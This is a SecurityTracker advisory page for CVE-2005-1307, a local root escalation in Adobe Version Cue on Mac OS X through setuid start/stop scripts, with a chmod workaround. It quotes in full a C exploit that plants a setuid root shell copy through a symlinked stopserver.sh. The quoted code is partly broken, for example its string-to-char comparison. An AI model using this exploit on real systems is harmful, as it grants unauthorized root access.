SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Adobe Version Cue Vendors:   Adobe Systems Incorporated
(Exploit is Available) Adobe Version Cue Start/Stop Scripts Let Local Users Execute Arbitrary Code With Root Privileges
SecurityTracker Alert ID:  1014023
SecurityTracker URL:  http://securitytracker.com/id/1014023
CVE Reference:   CVE-2005-1307   (Links to External Site)
Date:  May 21 2005
Impact:   Execution of arbitrary code via local system, User access via local system
Exploit Included:  Yes  
Version(s): 1.0, 1.0.1
Description:   A vulnerability was reported in Adobe Version Cue on Mac OS X. A local user can obtain root privileges on the target system.

The scripts used to start and stop Adobe Version Cue are configured with set user id (setuid) root user privileges and do not validate the path names.

A local user can create specially crafted scripts and modify the current path to point to the directory containing those scripts. Then, when Adobe Version Cue is started or stopped, the scripts will run with root user privileges.

Jonathan Bringhurst reported this vulnerability.

Impact:   A local user can execute arbitrary code with root privileges on the target system.
Solution:   No vendor solution was available at the time of this entry.

The author of the report has provided the following temporary workaround (which may disable some Adobe Version Cue functions):

'sudo chmod 0755 /Applications/Adobe\ Version\ Cue/stopserver.sh'
'sudo chmod 0755 /Applications/Adobe\ Version\ Cue/startserver.sh'

Vendor URL:  www.adobe.com/products/creativesuite/versioncue.html (Links to External Site)
Cause:   State error
Underlying OS:  UNIX (macOS/OS X)
Underlying OS Comments:  10.3.6

Message History:   This archive entry is a follow-up to the message listed below.
Dec 7 2004 Adobe Version Cue Start/Stop Scripts Let Local Users Execute Arbitrary Code With Root Privileges



 Source Message Contents

Subject:  Mac OS X - Adobe Version Cue local root exploit [c version exploit]




/************************************************************************************************\
 [ Mac OS X - Adobe Version Cue local root exploit ]                                           
                    c version exploit                                                    
                --=== by ActionSpider ===--                                       
                     Iam sun-os hehehe                                          			                 ActionSpider@Linuxmail.org   
                                    

[http://www.Ashiyane.com] 
[http://www.Ashiyane.net]                                        
[http://defacers.com.mx ]		                                 
           			                                                                         
*************************************************************************************************|                               
                                                               
Greetz to: [ Behrooz & Nima  &  Ehsan & str0ke & Status-x  & Mafia_Boy  &  stealh  ]           
&&                                                                                               
Greetz to: [  and all member of SegmentationFault Group                                          
                                                                                                 Code written By ActionSpider Mac
 OS X - Adobe Version [C] version Exploit;)                                                                        
\************************************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>


int main(){
int x =1;
char a= "root";


printf("\t[ Mac OS X - Adobe Version Cue local root exploit ]\n");
printf("\t\t--==Code written By ActionSpider==--\n");
printf("\t\t --=ActionSpider@Linuxmail.org=--\n");
printf("\t\t\t[ www.Ashiayne.com ]\n\n\n");


printf("w8 for geting root man...\n");
for (x=1;x<=75;x++){
	printf("#");}
					 


printf("\nyour id now:");
system("id");
printf("touch productname.sh...");
system("echo cp /bin/sh /Users/$USER; >> productname.sh");
system("echo chmod 4755 /Users/$USER/sh; >> productname.sh");
system("echo chown root /Users/$USER/sh >> productname.sh");
printf("chmod productname.sh 0755");
system("chmod 0755 ./productname.sh");
printf("ok w8 for touch link...");
system("ln -s $path/stopserver.sh");
printf("exection it :p hehe\n");
system("./stopserver.sh");
system("./sh");
printf("ok w8 for see system rooted or not \n\n");


system("id");
       if (system("whoami") == a)
printf("\n\n ok system now rooted hehe...:P");
       else 
printf("sory this server is patch :(\n");
						
}






           
	
	

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC